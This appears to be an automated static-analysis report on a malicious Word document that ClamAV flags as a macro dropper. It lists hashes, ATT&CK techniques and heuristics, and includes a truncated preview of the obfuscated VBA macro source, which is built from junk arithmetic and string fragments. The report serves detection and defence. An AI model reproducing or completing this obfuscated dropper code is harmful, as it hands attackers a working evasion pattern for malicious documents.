Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30309185cb8b9426…

MALICIOUS

Office (OLE)

196.5 KB Created: 2018-02-26 14:33:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 7aaead5720dcd59f437df010e0f44dc2 SHA-1: 4892c31898c439b9bbafa4ee696c25cce7f46067 SHA-256: 30309185cb8b9426b4fb795fd56b4b59b374e1eb68b87226972191fb28f2e7c9
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The 'OLE_VBA_SHELL' and 'OLE_VBA_AUTOOPEN' heuristics indicate that the macro is designed to execute commands upon opening. The presence of 'macros.bas' and the ClamAV detection further confirm its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6457486-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6457486-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 62833 bytes
SHA-256: babf00914039e694307da8abc1b221d53d17c60d1a6620153d4f5a0c2764b854
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 30 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PwziujTfp"
Sub ABbjLh(jzUZnCW)
   On Error Resume Next
   Dim TnRzjt()
   ReDim jcDLawt(2)
   mUtFm(0) = 186042
   VWzlKcTsbuaVb(1) = 8745430
   hGNpU = Loo - 9768715
   zHMpwiFuwk = 1482312 * 4763798
End Sub
Function bplDlcUjMrj()
On Error Resume Next
qWrihMAw = "WrnPWvjkSNYUiSpJcuvOISMKQD%3rav%t"
khFFu = oophdWzuY = aJcaBfTXlwt = (1294587 / MCmsfrLGLwBPI + 6738043 * SdTMq * (9017016 / DCkltUviEiivdi / 8339068 - Tan(SDMYPKaKsw / CBool(EIdhQzNz / 6940133 / twqLju))))
EULibDzk = XhMFYazAJ = VjsbZtwErW = (5097373 / RwPiHWZEWNiQDc + 6020661 * siJcYmbdHIizB * (7452837 / KUaPOqtT / 5527048 - Tan(EHIBbXwOGL / CBool(MzYfWmX / 9744913 / ZDjtXwdNQAwK))))
JQPBruZZRtK = gjHBjhbyuf(qWrihMAw, 2, 6)
DVozWiuzOuZ = "WsbRTlsOntld% tes&&!%2rav%!=%8k"
ddzkYHBZDP = uzNrYzBTu = IzfthCwiElY = (8138226 / rtWvMidrcb + 1888411 * sfminMaVtzGo * (2552482 / HlikMOETWwBEo / 7796969 - Tan(qfYVFoWM / CBool(RZzVk / 8937613 / ihUWsNrPvjZJ))))
JTpvKLli = ohiXmECRi = IDkZiTnQ = (6781359 / bKSWURYdoIZ + 4079802 * NXSjBLRh * (5615001 / PZQmT / 6694749 - Tan(bfApidOLC / CBool(fYcZtmoX / 316500 / klESBwF))))
IdBIowifGRz = gjHBjhbyuf(DVozWiuzOuZ, 2, 18)
uwcviiKlFFZ = "kzKqUrLXlNwRGViw% tes&q"
OZYIzNYXs = CumzdDVXl = jBfjbz = (7340989 / BkKUMJn + 1906371 * OuiGBmFjrJXQG * (6092283 / aZFkromZXE / 4979778 - Tan(EhicKTNG / CBool(HziPawknOw / 9109831 / funDC))))
fSELvBXcauM = SBcVHCbSB = JjNws = (4764378 / TaXVQ + 8329093 * lJHiO * (4804353 / vYHBMiHAwGzZ / 9042006 - Tan(HAACjdaMjh / CBool(Kajzu / 9357426 / cNOHF))))
QEAcQAJYZ = gjHBjhbyuf(uwcviiKlFFZ, 2, 10)
mFTkVjEMc = "GHmsjiFaRSCrqtA% tescDkhmsnh"
hwVaYO = QjjkQKrvM = HJdQwjbcmPZTw = (6108394 / NGqlEDMQHcii + 8737013 * rNBzNsTnYoUqkc * (4991552 / zkAwDDAJIousWn / 3066620 - Tan(hfvBY / CBool(imTZiBRN / 3643688 / rKfwiusnMrqZ))))
rqWhnTPsRiQ = waRkYTIEh = ZdBNfiVzs = (9146293 / JBLIRTnnH + 7861447 * dJosHwczEOD * (3596670 / CzUPORNzvDoY / 1146602 - Tan(HAVRZjszrZ / CBool(WWWvqGGiaFTw / 4577536 / pbhiFzTBW))))
ltVsvUrMuD = gjHBjhbyuf(mFTkVjEMc, 9, 12)
KObawI = "NjpXv%!!%3rav%!!%8raJarvfjaczpinMkwM"
GJzkG = cIowBUDWG = YBRrilKAtXh = (4251518 / nafFwir + 1236977 * zzsNV * (4629721 / VBZjXRuDjQRCn / 5948549 - Tan(GGwBYW / CBool(HnObVCT / 9866287 / QmHXVHpnV))))
DpijauaTqH = fcVjRpSXo = mQTzWGulRwvsj = (6950698 / BQfHowQIftttbW + 4867325 * wNbMEw * (7396643 / RbWXrZmslkPZ / 7512368 - Tan(AtVHoGdM / CBool(OsoziHXq / 941982 / vpNcsRFGBI))))
QIowZdwd = gjHBjhbyuf(KObawI, 17, 16)
lGqtWiq = "ZKnTuLIfU !%6rav%!!%5rI"
PsZNEzBwCW = HRmXRHjYW = iQIFMvhGYQ = (8313381 / zfTfVqAmw + 8984366 * zEQNq * (6361306 / GJZnwpsFwkiiQt / 218326 - Tan(SGEmlsYjckNL / CBool(whrYb / 1816242 / wLjdmQsPHQi))))
YalTu = KwTzGlvMO = qLMbjECCnJpj = (3800200 / HXazUAIbMFDP + 6359402 * aFdPvvGAXCFLqN * (3930053 / oacipj / 2010474 - Tan(rNcOwGYRXDbhfZ / CBool(XiHAYtJJvHFR / 5559832 / CJrviYhTrBQd))))
NtYno = gjHBjhbyuf(lGqtWiq, 2, 13)
wVmCM = "DMNFpoLY&wo=%2rav% tesWlC"
JYLjfo = wITkduPzs = dLEZYZOCChwd = (8472357 / wLGMTQwuPN + 4001987 * IfhjCIGT * (6697446 / zClukmIACUQp / 7250321 - Tan(oDibqjvq / CBool(EQiUT / 6000704 / XYvMNDaZjLlPK))))
JRzhG = zDTuPuzii = zpHzhdCSpU = (2405649 / rtYFkcEvizjfFA + 9436503 * FYjMtvvWGFsv * (5752764 / wuwCMZVKKWZiw / 296311 - Tan(bshjOM / CBool(oADwwBwi / 6935646 / RkBlhC))))
VRkzwtdoudA = gjHBjhbyuf(wVmCM, 4, 14)
FNPaw = "mzbAHoiXiJKDSVjGWSKVNvFAGPEqUFv% tes&&OwDnsCKbQpmN"
kvJwsj = whTGrAQJw = tEmhouEzwHY = (3863135 / VKwiYQwZlzuYh + 1543670 * sFzOjHUJ * (7044605 / VjmLnMocoww / 8642987 - Tan(rsAKHFsJG / CBool(kGtIKnlBBOwD / 6444683 / OwnFwtJ))))
GczwKMUjB = XzjIVfzMD = YOwCEtEioDzvi = (4944329 / LpwJSmMNcNHJ + 8928 * IoozWXpkJJEj * (5348434 / pMbUJT / 2071893 - Tan(ADlFMATozkDpj / CBool(IwICzaf / 7452487 / jKFXQ))))
rNDWzFNC = gjHBjhbyuf(FNPaw, 8, 13)
XCLAjHN = "TAMUmCqzp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.